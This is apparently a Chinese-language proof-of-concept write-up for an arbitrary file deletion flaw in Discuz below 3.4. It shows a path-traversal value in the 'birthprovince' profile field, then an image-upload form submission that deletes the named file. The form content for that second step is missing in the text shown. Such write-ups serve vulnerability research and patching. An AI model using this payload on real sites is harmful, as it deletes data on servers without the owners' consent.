Discuz_<3.4_birthprovince_前台任意文件删除

# Discuz_<3.4_birthprovince_前台任意文件删除

## Affected Version

Discuz < 3.4 版本 需要会员身份登陆站点。 下载地址: 链接: https://pan.baidu.com/s/1hsOoSte 密码: nvjj ## PoC 测试: 1. 为了不破坏原有程序,在根目录下新建 1.txt 作为演示。 ![1](/static/baige/01-CMS漏洞/Discuz/Discuz_<3.4_birthprovince_前台任意文件删除/1.PNG) 2. 登陆前台,访问 http://localhost/Discuz/Discuz_X3.2_TC_BIG5/home.php?mod=spacecp&ac=profile&op=base 先发起一个POST请求 birthprovince=../../../1.txt&profilesubmit=1&formhash=18a19dce // formhash 需要右键查看源代码得到 成功后,个人信息已经被修改成如下: ![changed](/static/baige/01-CMS漏洞/Discuz/Discuz_<3.4_birthprovince_前台任意文件删除/changed.PNG) 3. 最后,本地提交POST表单删除文件 1.txt 表单内容:



随便上传一个图片提交会导致删除 birthprovince 设置的文件名称,在这里是 1.txt。

## References

1. http://www.freebuf.com/vuls/149904.html
2. http://www.freebuf.com/articles/system/149810.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容